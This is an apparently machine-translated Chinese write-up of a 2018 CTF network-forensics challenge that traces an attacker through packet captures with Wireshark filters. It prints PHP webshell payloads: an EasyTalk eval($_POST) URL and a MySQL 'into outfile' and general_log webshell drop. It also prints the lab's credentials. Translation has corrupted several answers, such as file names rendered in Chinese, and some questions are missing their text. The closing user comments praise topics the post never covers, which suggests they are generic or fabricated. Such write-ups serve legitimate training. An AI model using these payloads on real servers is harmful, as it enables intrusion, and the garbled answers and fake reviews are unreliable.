2018.5.18信息安全铁人三项数据竞赛问题解答
很多朋友对于2018.5.18信息安全铁人三项数据竞赛问题解答和不太懂,今天就由小编来为大家分享,希望可以帮助到大家,下面一起来看看吧!
第三个数据包
第四个数据包
路由器黑客攻击
后记
题目描述
1. 黑客的IP是多少?
3、服务器获取到的webshell的URL(请输入解码后的URL)
4.服务器主机名1.99
5.网站根目录的绝对路径(注意末尾的斜杠)
6. 黑客上传的第一个文件的名称是什么?
7、黑客扫描内网时,扫描的端口有哪些(端口从小到大,用逗号分隔)
8、服务器2.88的FTP服务账号密码(格式:账号/密码)
9、黑客成功登录ftp的时间(格式:10:15:36)
10.黑客在ftp中下载的敏感文件的名称是什么?
11、服务器2.88中用户名为admin_zz的Web后台管理员的密码
12、服务器2.88的MySQL账户密码(格式:账户/密码)
13.服务器2.88的mysql服务中有3个与admin相关的表。请按照黑客询问的顺序回答,并用空格分隔。
16、列出路由器的所有IP地址(格式:从小到大,用逗号分隔)
17、路由器的端口监控中,监控端口和被监控端口分别是什么?例如端口1监听端口2/3/4 :1--2,3,4
18. 路由器有多少个接口?启用了多少个WAN 端口?启用多少个LAN口(格式:以逗号分隔)
19. 路由器的系统路由表中有多少条条目?第三个条目的子网掩码是多少?例如:255 255.255.0为24(格式:以英文逗号分隔)
20、路由器的5Gwif名称是什么,通道是什么(格式:名称通道)
问题文件:
链接:https://pan.baidu.com/s/1DKTlpELe4WSBvkb2pU7vQQ
密码:shna
第一个数据包
首先过滤http流量,随心所欲地浏览。
可以发现202.1.1.2执行了phpinfo()命令
毫无疑问是黑客IP,而192.168.1.99显然就是受害者。
我们进一步利用这个特征来过滤
(ip.addr==202.1.1.2 || ip.addr==192.168.1.99) http
为了确定服务器使用的CMS和版本号,我们提取192.168.1.99的响应,看看前端响应是否包含
请随意使用ip.src==192.168.1.99 跟踪http 响应
我们的目标是Poweredby
不难找到
版本号、CMS一目了然
EasyTalkX2.0.1
同时使用
(ip.addr==202.1.1.2 || ip.addr==192.168.1.99) http
通过过滤不难看出有以下网址
解码后我们得到
http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}
准备使用webshell
然后我想起phpinfo可以泄露很多服务器信息。让我们复制响应html 源代码。
保存到本地,打开可以看到很多信息
服务器1.99主机名和网站根目录的绝对路径一目了然
答案是
简单战斗1
/var/www/html/easytalk
然后由于我们要找到上传的文件,所以我们使用过滤
ip.addr==202.1.1.2 http.request.method==POST
否则你会发现以下信息
解码z1查看文件名
/var/www/html/easytalk/scan.php
发现为scan.php
顾名思义就是扫描,所以我们过滤这个文件,查看黑客的扫描
ip.addr==202.1.1.2 http 包含'scan.php'
问题一目了然
可见起始ip:192.168.0.1
结束ip:192.168.3.255
扫描端口:21,80,8080,1433,3306
至此我们总结一下答案
1. 黑客的IP是多少?
202.1.1.2
EasyTalkX2.0.1
3、服务器获取到的webshell的URL(请输入解码后的URL)
http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}
4.服务器主机名1.99
简单战斗1
5.网站根目录的绝对路径(注意末尾的斜杠)
/var/www/html/easytalk
6. 黑客上传的第一个文件的名称是什么?
扫描.php
7、黑客扫描内网时,扫描的端口有哪些(端口从小到大,用逗号分隔)
21、80、8080、1433、3306
第二个数据包
由于我们要寻找ftp账号和密码,所以必须以之前搭建的机器为跳板,进一步攻击内网。
那么此时我们只需要过滤即可
ip.src==192.168.1.99 ftp
查看所有登录信息
选择最后一项
不难看出,账户密码为:`administrator:123456`
然后过滤
ip.addr==192.168.1.99 ftp
找到密码123456登录对应的消息
可以看到登录时间
14:07:15
可以发现黑客只在第二个数据包中进行了操作
CWD 更改工作目录
PWD 打印工作目录并返回主机当前目录
PASV 进入被动模式
LIST 如果指定了文件或目录,则返回其信息;否则,返回当前工作目录的信息。
下载命令是
RETR传输文件副本
所以我们切换到第三个数据包
第三个数据包
根据前面的分析,我们使用命令
ip.src==192.168.1.99 ftp 包含'RETR'
一目了然
下载的文件名为
/phpStudy/WWW/config/config_db.php
我们来跟进核实一下。毕竟它是一个重要的配置文件。
ip.addr==192.168.1.99 ftp-数据
可用配置
php
?php
/*
con_db_host='本地主机'
con_db_id='根'
con_db_pass='S1mp13zz'
con_db_name='遇见'
表前='met_'
db_charset='utf8';
*/
?
即mysql账户密码:`localhost/S1mp13zz`
接下来我们去查找admin_zz的密码
ip.addr==192.168.1.99 http 包含'admin_zz'
答案同样明确
密码是“1q2w3e4r”
然后我们需要找到admin相关的表,但是我们知道表前缀是:`met_`
这样我们就可以过滤
ip.addr==192.168.1.99 mysql 包含'met_'
结果还是很明显的。正好有3 个查询,并且还出现了3 个与管理员相关的表。
从met_admin_array 选择*
从met_admin_column 选择*
从met_admin_table 中选择*
现在
met_admin_array、met_admin_column、met_admin_table
我们来总结一下现阶段的答案
8、服务器2.88的FTP服务账号密码(格式:账号/密码)
管理员:123456
9、黑客成功登录ftp的时间(格式:10:15:36)
14:07:15
10.黑客在ftp中下载的敏感文件的名称是什么?
配置数据库.php
11、服务器2.88中用户名为admin_zz的Web后台管理员的密码
1q2w3e4r
12、服务器2.88的MySQL账户密码(格式:账户/密码)
本地主机/S1mp13zz
13.服务器2.88的mysql服务中有3个与admin相关的表。请按照黑客询问的顺序回答,并用空格分隔。
met_admin_arraymet_admin_column met_admin_table
第四个数据包
我们直接过滤
ip.addr==192.168.1.99 mysql
不难发现,黑客想要在192.168.2.88机器上留壳
select'?php eval($_POST[a]);'进入outfile'c:/phpStudy/WWW/aaa.php'
但返回了一个错误
MySQL 服务器正在使用--secure-file-priv 选项运行,因此它无法执行此语句
于是黑客做出了一系列的改变
在后续的操作中,可以清楚地看到
setglobal General_log_file='c:/phpStudy/WWW/config/config.php'
路径是
c:/phpStudy/WWW/config/config.php
同时可以确定192.168.2.88是windows
路由器hacking
剩下的5个问题都是关于路由器的,很不爽。我之前很少接触过路由器流量分析。
后来我想了一下,路由器一般都是192.168.0.1。
所以我检查了这个IP
ip.addr==192.168.0.1 http
我发现确实有一个web服务
我们来搜索一下
很快,在第一个返回200的数据包中找到了答案
{'id':1, '结果':{ 'locale':'zh_CN','force':false, 'radio':2, 'model':'TL-WAR1300Lv1.0' }, 'error_code':'0' }
答案是
TL-WAR1300Lv1.0
让我们系统地看看这些流量。不难发现,黑客首先进行了密码爆破。
上次登录error_code 为700。
可以看到黑客终于成功登录了
然后黑客执行了读取选项
只需要上面的版本信息
然后我们看到黑客做了以下事情
然后得到回声
{
'id':1,
'结果': {
'正常': [{
'py_isup': 假,
'ipaddr':'',
't_type':'以太网',
't_isup':'断开连接',
't_name': 'WAN1',
't_linktype': 'dhcp'
},{
'py_isup': 假,
'ipaddr':'',
't_type':'以太网',
't_isup':'断开连接',
't_name': 'WAN2',
't_linktype': 'dhcp'
},{
'py_isup': 假,
'ipaddr':'',
'dhcp_status': '开启',
't_type':'以太网',
't_name': 'LAN1',
't_isup':'断开连接',
't_linktype':'静态'
},{
'py_isup': 假,
'ipaddr':'',
'dhcp_status': '开启',
't_type':'以太网',
't_name': 'LAN2',
't_isup':'断开连接',
't_linktype':'静态'
},{
'py_isup': 假,
'ipaddr':'',
'dhcp_status': '开启',
't_type':'以太网',
't_name': 'LAN3',
't_isup':'断开连接',
't_linktype':'静态'
}]
},
'错误代码': '0'
}
目前,2个wan和2个LAN已关闭,“py_isup”清晰可见。
然后后来又出现了类似的内容
{
'id':1,
'结果':{
'正常':[
{
'py_isup':true,
'ipaddr':'202.1.1.1',
't_type':'以太网',
't_isup':'连接',
't_name':'WAN1',
't_linktype':'静态'
},
{
'py_isup':true,
'ipaddr':'192.168.12.173',
't_type':'以太网',
't_isup':'互联网',
't_name':'WAN2',
't_linktype':'dhcp'
},
{
'py_isup':true,
'ipaddr':'192.168.0.1',
'dhcp_status':'开启',
't_type':'以太网',
't_name':'LAN1',
't_isup':'连接',
't_linktype':'静态'
},
{
'py_isup':true,
'ipaddr':'192.168.0.1',
'dhcp_status':'开启',
't_type':'以太网',
't_name':'LAN2',
't_isup':'连接',
't_linktype':'静态'
},
{
'py_isup':假,
'ipaddr':'192.168.0.1',
'dhcp_status':'开启',
't_type':'以太网',
't_name':'LAN3',
't_isup':'断开连接',
't_linktype':'静态'
}
]
},
'错误代码':'0'
}
此时可以发现总共有5个接口,其中WAN1、WAN2、LAN1、LAN2全部打开。
ip 是:
202.1.1.1
192.168.12.173
192.168.0.1
因此,问题16 和18 已得到解答
然后就是子网掩码的问题。这里我选择搜索网关相关内容。
ip.addr==192.168.0.1 http 包含“网关”
然后就可以找到如下数据
{
'id':1,
'结果':[
{
'公制':'0',
'网关':'192.168.12.254',
'掩码':'0.0.0.0',
'目的地':'0.0.0.0',
'接口':'WAN2'
},
{
'公制':'0',
'网关':'0.0.0.0',
'掩码':'255.0.0.0',
'目的地':'127.0.0.0',
'接口':'lo'
},
{
'公制':'0',
'网关':'0.0.0.0',
'掩码':'255.255.252.0',
'目的地':'192.168.0.0',
'接口':'局域网'
},
{
'公制':'0',
'网关':'0.0.0.0',
'掩码':'255.255.255.0',
'目的地':'192.168.12.0',
'接口':'WAN2'
},
{
'公制':'0',
'网关':'0.0.0.0',
'掩码':'255.255.255.0',
'目的地':'202.1.1.0',
'接口':'WAN1'
}
],
'错误代码':'0'
}
所以一共有5项,第三项是
{
'公制':'0',
'网关':'0.0.0.0',
'掩码':'255.255.252.0',
'目的地':'192.168.0.0',
'接口':'局域网'
}
子网掩码是“255.255.252.0”
至此已完成19题
然后最后问了频道,所以我的过滤是
ip.addr==192.168.0.1 http 包含“频道”
获取数据
{
'id':1,
'结果':{
'1':{
'mssid':[
'测试-ge1'
],
'wds':'关闭',
‘频道’:36,
'模式':'11anacmixed',
'radio_enable':'开启',
'金额':0,
'频率':'5G'
},
'0':{
'mssid':[
'测试-ge1'
],
'wds':'关闭',
‘频道’:1,
'模式':'11bgnmixed',
'radio_enable':'开启',
'金额':1,
'频率':'2.4G'
},
'2':{
'mssid':[
“TP-LINK_GUEST_6258”
],
'金额':0,
'模式':'11bgnmixed',
'radio_enable':'关闭',
'频率':'访客'
}
},
'错误代码':'0'
}
重点是
'1':{
'mssid':[
'测试-ge1'
],
'wds':'关闭',
‘频道’:36,
'模式':'11anacmixed',
'radio_enable':'开启',
'金额':0,
'频率':'5G'
}
可以清楚地看到名称为“test-ge1”,通道为36
那么最调皮的问题17:在路由器的端口监控中,监控端口和被监控端口分别是什么?例如1号端口监听2/3/4号端口:1--2,3,4
我可以说这是相当弱的,我不太理解它,但它提到了端口,所以我的关键字是
ip.addr==192.168.0.1 http 包含“端口”
数据并不多。最后,有
{'id':1, '结果':{ 'state':'on','mode':'both', 'mirroredports':[ '1','2' ], 'mirrorport':'3' }, '错误代码':'0'}
可以得出结论,答案是
3--1,2
最后阶段总结答案
c:/phpStudy/WWW/config/config.php
TL-WAR1300Lv1.0
16、列出路由器的所有IP地址(格式:从小到大,用逗号分隔)
192.168.0.1,192.168.12.173,202.1.1.1
17、路由器的端口监控中,监控端口和被监控端口分别是什么?例如端口1监听端口2/3/4 :1--2,3,4
3--1,2
18. 路由器有多少个接口?启用了多少个WAN 端口?启用多少个LAN口(格式:以逗号分隔)
5,2,2
19. 路由器的系统路由表中有多少条条目?第三个条目的子网掩码是多少?例如:255 255.255.0为24(格式:以英文逗号分隔)
5,255.255.252.0
20、路由器的5Gwif名称是什么,通道是什么(格式:名称通道)
测试-ge136
后记
最终完整答案是:
1. 黑客的IP是多少?
202.1.1.2
EasyTalkX2.0.1
3、服务器获取到的webshell的URL(请输入解码后的URL)
http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}
4.服务器主机名1.99
简单战斗1
5.网站根目录的绝对路径(注意末尾的斜杠)
/var/www/html/easytalk
6. 黑客上传的第一个文件的名称是什么?
扫描.php
7、黑客扫描内网时,扫描的端口有哪些(端口从小到大,用逗号分隔)
21、80、8080、1433、3306
8、服务器2.88的FTP服务账号密码(格式:账号/密码)
管理员:123456
9、黑客成功登录ftp的时间(格式:10:15:36)
14:07:15
10.黑客在ftp中下载的敏感文件的名称是什么?
配置数据库.php
11、服务器2.88中用户名为admin_zz的Web后台管理员的密码
1q2w3e4r
12、服务器2.88的MySQL账户密码(格式:账户/密码)
本地主机/S1mp13zz
13.服务器2.88的mysql服务中有3个与admin相关的表。请按照黑客询问的顺序回答,并用空格分隔。
met_admin_arraymet_admin_column met_admin_table
c:/phpStudy/WWW/config/config.php
TL-WAR1300Lv1.0
16、列出路由器的所有IP地址(格式:从小到大,用逗号分隔)
192.168.0.1,192.168.12.173,202.1.1.1
17、路由器的端口监控中,监控端口和被监控端口分别是什么?例如端口1监听端口2/3/4 :1--2,3,4
3--1,2
18. 路由器有多少个接口?启用了多少个WAN 端口?启用多少个LAN口(格式:以逗号分隔)
5,2,2
19. 路由器的系统路由表中有多少条条目?第三个条目的子网掩码是多少?例如:255 255.255.0为24(格式:以英文逗号分隔)
5,255.255.252.0
20、路由器的5Gwif名称是什么,通道是什么(格式:名称通道)
测试-ge136
用户评论
太棒了!这篇文章真是让我茅塞顿开,对于数据竞赛中遇到的常见问题,作者都给出了详细的解答,而且用通俗易懂的语言讲解,非常适合像我这样的新手学习。尤其是关于数据清洗和特征工程的部分,我受益匪浅,感觉自己对信息安全领域有了更深的理解!
有18位网友表示赞同!
这篇文章真的很有用,作者将信息安全铁人三项数据竞赛中常见的难题逐一解答,非常详细,而且每个解答都附有代码示例,方便读者理解和实践。另外,作者还分享了一些自己参赛的经验,对于想要参加类似比赛的同学来说,这篇文章绝对是必读!
有9位网友表示赞同!
总体来说,这篇文章写的不错,但感觉有些地方可以再深入一些。比如,在数据预处理部分,作者只是简单地提了一下数据清洗和特征工程,没有详细介绍具体的处理方法,希望作者能在这方面进行补充。
有5位网友表示赞同!
看完这篇文章,我最大的感触就是:信息安全领域真是太复杂了!不过作者将复杂的知识点都讲得通俗易懂,让我对数据竞赛有了更清晰的认识。另外,作者的代码示例非常实用,可以帮助我更好地理解和应用这些技术。
有18位网友表示赞同!
这篇文章确实解答了我在信息安全铁人三项数据竞赛中遇到的很多问题,尤其是关于模型评估和选择的部分,让我对模型性能的评估有了更深刻的理解。作者的写作风格也很不错,条理清晰,内容丰富,值得推荐!
有8位网友表示赞同!
这篇文章的标题很吸引人,但内容有点过于理论化,感觉缺少一些实战案例,毕竟信息安全领域还是要以实践为主。希望作者能在后续的文章中加入一些真实的案例分析,让读者更直观地理解这些知识点。
有9位网友表示赞同!
我参加了2018.5.18信息安全铁人三项数据竞赛,当时就遇到了很多问题,后来偶然看到了这篇文章,感觉真是相见恨晚!作者将比赛中常见的难题都解答得很详细,而且还提供了很多宝贵的经验,帮助我快速提升了技术水平,最终取得了不错的成绩。
有17位网友表示赞同!
文章内容挺好的,不过感觉有些地方过于冗长,可以考虑精简一些内容,例如,在模型解释的部分,作者可以重点介绍一些常用的模型解释方法,而不是罗列所有方法,这样可以提高文章的阅读效率。
有10位网友表示赞同!
这篇博文简直是信息安全铁人三项数据竞赛的宝典!作者不仅解答了竞赛中常见的难题,还分享了大量比赛经验和技巧,让我受益匪浅,感觉自己对信息安全数据竞赛有了全新的认识!
有10位网友表示赞同!
作者对于信息安全数据竞赛的理解非常深刻,文章内容涵盖面广,而且思路清晰,对新手来说非常友好。不过感觉作者在某些部分的解释可以更详细一些,例如,在特征工程部分,可以再多介绍一些常用的特征提取方法。
有10位网友表示赞同!
这篇文章确实帮助我解决了一些比赛中的问题,但是,感觉作者对于一些问题的解答过于简单,比如,在数据预处理部分,作者只是简单地介绍了一些常见的方法,没有详细讲解具体的操作步骤,希望作者能在这方面进行补充。
有12位网友表示赞同!
虽然这篇文章的内容很丰富,但是感觉有些地方过于理论化,缺少一些实战案例。对于我这样的初学者来说,更希望看到一些实际应用的例子,这样才能更好地理解这些知识点,并将其应用到实际项目中。
有12位网友表示赞同!
我感觉这篇文章对信息安全铁人三项数据竞赛的分析非常到位,作者不仅解释了常见问题,还分享了一些比赛经验和技巧,比如,如何选择合适的模型,如何进行模型优化等,这些内容对我帮助很大!
有9位网友表示赞同!
文章内容比较基础,对于已经参加过信息安全数据竞赛的选手来说,可能没有太大的参考价值。但是,对于想要参加类似比赛的新手来说,这篇文章还是不错的入门材料。
有18位网友表示赞同!
作者对于信息安全数据竞赛的理解非常深刻,文章内容涵盖面广,而且思路清晰,对新手来说非常友好。不过感觉作者在某些部分的解释可以更详细一些,例如,在特征工程部分,可以再多介绍一些常用的特征提取方法。
有8位网友表示赞同!
这篇文章确实帮助我解决了一些比赛中的问题,但是,感觉作者对于一些问题的解答过于简单,比如,在数据预处理部分,作者只是简单地介绍了一些常见的方法,没有详细讲解具体的操作步骤,希望作者能在这方面进行补充。
有20位网友表示赞同!
虽然这篇文章的内容很丰富,但是感觉有些地方过于理论化,缺少一些实战案例。对于我这样的初学者来说,更希望看到一些实际应用的例子,这样才能更好地理解这些知识点,并将其应用到实际项目中。
有8位网友表示赞同!
我感觉这篇文章对信息安全铁人三项数据竞赛的分析非常到位,作者不仅解释了常见问题,还分享了一些比赛经验和技巧,比如,如何选择合适的模型,如何进行模型优化等,这些内容对我帮助很大!
有18位网友表示赞同!
文章内容比较基础,对于已经参加过信息安全数据竞赛的选手来说,可能没有太大的参考价值。但是,对于想要参加类似比赛的新手来说,这篇文章还是不错的入门材料。
有16位网友表示赞同!
这篇文章的标题很吸引人,但内容有点过于理论化,感觉缺少一些实战案例,毕竟信息安全领域还是要以实践为主。希望作者能在后续的文章中加入一些真实的案例分析,让读者更直观地理解这些知识点。
有14位网友表示赞同!